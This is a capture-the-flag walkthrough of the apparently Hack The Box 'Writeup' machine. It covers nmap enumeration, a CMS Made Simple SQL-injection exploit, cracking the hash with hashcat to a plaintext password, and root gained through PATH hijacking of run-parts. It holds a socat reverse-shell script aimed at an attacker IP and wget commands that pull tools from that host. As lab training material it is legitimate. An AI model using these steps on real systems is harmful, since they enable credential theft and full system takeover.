$ nmap -A -T4 -p- -sV 10.10.10.138
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-16 21:59 CEST Nmap scan report for 10.10.10.138 Host is up (0.042s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA) | 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA) |_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519) 80/tcp open tcpwrapped Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 122.74 seconds
Although nmap says port 80 is open, it also appears to be as tcpwrapped.
What does it mean?
Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux.
When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper.
Specifically, it means that a full TCP handshake was completed, but the remote host closed the connection without receiving any data.https://secwiki.org/w/FAQ_tcpwrapped
It is important to note that tcpwrapper protects programs, not ports.
This means that a valid (not false-positive) tcpwrapped response indicates a real network service is available, but you are not on the list of hosts allowed to talk with it.
When a very large number of ports are shown as tcpwrapped, it is unlikely that they represent real services, so the behaviour probably means something else like a load balancer or firewall is intercepting the connection requests.
Access to http://10.10.10.138
Eeyore DoS protection script?
We’ve found this page.
According to this data,
GET http://10.10.10.138/writeup/index.php?page=writeup HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Pragma: no-cache Cache-Control: no-cache Content-Length: 0 Referer: http://10.10.10.138/writeup/ Host: 10.10.10.138 Cookie: CMSSESSID9d372ef93962=c5esgjkeaerfa215rs0119gat7
There is a Cookie called:
We could use wpscan to try to guess what cms are we targeting, but in this case, it is just as easy as check the source code of the web page.
CMS Made simple
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
On Google: CMS Made simple 2019
$ python3 46635.py --url http://10.10.10.138/writeup/ --wordlist /usr/share/wordlists/rockyou.txt [+] Salt for password found: 5a599ef579066807 [+] Username found: jkr [+] Email found: email@example.com [+] Password found: 62def4866937f08cc13bab43bb14e6f7
According to the script code, the password found will be obtained as an MD5 Hash. Hashcat can be used to crack it.
To be able to do it we also need the salt for the password found.
$ echo "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807" > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting... OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================= * Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4376/4440 MB (2048 MB allocatable), 2MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Early-Skip * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 64 MB Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 2 secs 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9 Session..........: hashcat Status...........: Cracked Hash.Name........: md5($salt.$pass) Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807 Time.Started.....: Sat Oct 17 17:22:23 2020 (8 secs) Time.Estimated...: Sat Oct 17 17:22:31 2020 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 577.3 kH/s (1.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 4360192/14344385 (30.40%) Rejected.........: 0/4360192 (0.00%) Restore.Point....: 4358144/14344385 (30.38%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: raynerleow -> raygan96 Started: Sat Oct 17 17:21:19 2020 Stopped: Sat Oct 17 17:22:32 2020
Password is : raykayjay9
So we have obtained user and password.
$ ssh firstname.lastname@example.org
The authenticity of host '10.10.10.138 (10.10.10.138)' can't be established. ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.138' (ECDSA) to the list of known hosts. email@example.com's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. jkr@writeup:~$
jkr@writeup:~$ cat user.txt
jkr@writeup:~$ wget http://10.10.14.25:8080/linpeas.sh
--2020-10-17 15:56:38-- http://10.10.14.25:8080/linpeas.sh Connecting to 10.10.14.25:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 293431 (287K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[=======================================================================>] 286.55K 579KB/s in 0.5s 2020-10-17 15:56:39 (579 KB/s) - ‘linpeas.sh’ saved [293431/293431]
jkr@writeup:~$ chmod +x linpeas.sh
Starting linpeas. Caching Writable Folders... ...
Analyzing the results we see that user jkr also belongs to group staff.
... [+] All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev) uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup) ...
It is not a default group.
staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may «override» the executables in /bin and /usr/bin with the same name). Compare with group «adm», which is more related to monitoring/security.
Group staff writable groups are:
[+] Interesting GROUP writable files (not in Home) (max 500) ... /var/local /usr/local /usr/local/bin /usr/local/include /usr/local/share /usr/local/share/sgml /usr/local/share/sgml/misc /usr/local/share/sgml/stylesheet /usr/local/share/sgml/entities /usr/local/share/sgml/dtd /usr/local/share/sgml/declaration /usr/local/share/fonts /usr/local/share/man /usr/local/share/emacs /usr/local/share/emacs/site-lisp /usr/local/share/xml /usr/local/share/xml/schema /usr/local/share/xml/misc /usr/local/share/xml/entities /usr/local/share/xml/declaration /usr/local/games /usr/local/src /usr/local/etc /usr/local/lib /usr/local/lib/python3.5 /usr/local/lib/python3.5/dist-packages /usr/local/lib/python2.7 /usr/local/lib/python2.7/dist-packages /usr/local/lib/python2.7/site-packages /usr/local/sbin ...
Based on the PATH variable,
/usr/local/bin is before /bin
Now let’s run pspy:
jkr@writeup:~$ wget http://10.10.14.25:8080/pspy64
--2020-10-17 16:51:47-- http://10.10.14.25:8080/pspy64 Connecting to 10.10.14.25:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: ‘pspy64’ pspy64 100%[=======================================================================>] 2.94M 6.53MB/s in 0.4s 2020-10-17 16:51:48 (6.53 MB/s) - ‘pspy64’ saved [3078592/3078592]
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
2020/10/17 17:06:01 CMD: UID=0 PID=17592 | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1 2020/10/17 17:06:19 CMD: UID=0 PID=17593 | sshd: jkr [priv] 2020/10/17 17:06:19 CMD: UID=0 PID=17594 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2020/10/17 17:06:19 CMD: UID=0 PID=17595 | run-parts --lsbsysinit /etc/update-motd.d 2020/10/17 17:06:19 CMD: UID=0 PID=17596 | /bin/sh /etc/update-motd.d/10-uname 2020/10/17 17:06:19 CMD: UID=0 PID=17597 | sshd: jkr [priv] 2020/10/17 17:06:19 CMD: UID=1000 PID=17598 | sshd: jkr@pts/1 2020/10/17 17:06:19 CMD: UID=1000 PID=17600 | -bash
When we log in from another ssh connection with user jkr, command run-parts is executed from a relative path.
This is important because it is when the PATH variable takes action.
when an absolute path is used, there is no need to use the PATH variable. The system knows where to find the command.
However, if a relative path is used, the system needs to check the PATH variable to find the first path that contains the required command.
In this case, if we create a run-parts command, when a new ssh connection is performed, this command will be executed.
Let’s create a known and «nice» run-parts command:
jkr@writeup:/tmp$ nano run-parts
#!/bin/bash socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.7:4242
jkr@writeup:/tmp$ chmod +x run-parts
jkr@writeup:/tmp$ cp run-parts /usr/local/bin/
socat file:tty,raw,echo=0 TCP-L:4242
root@writeup:/# cat /root/root.txt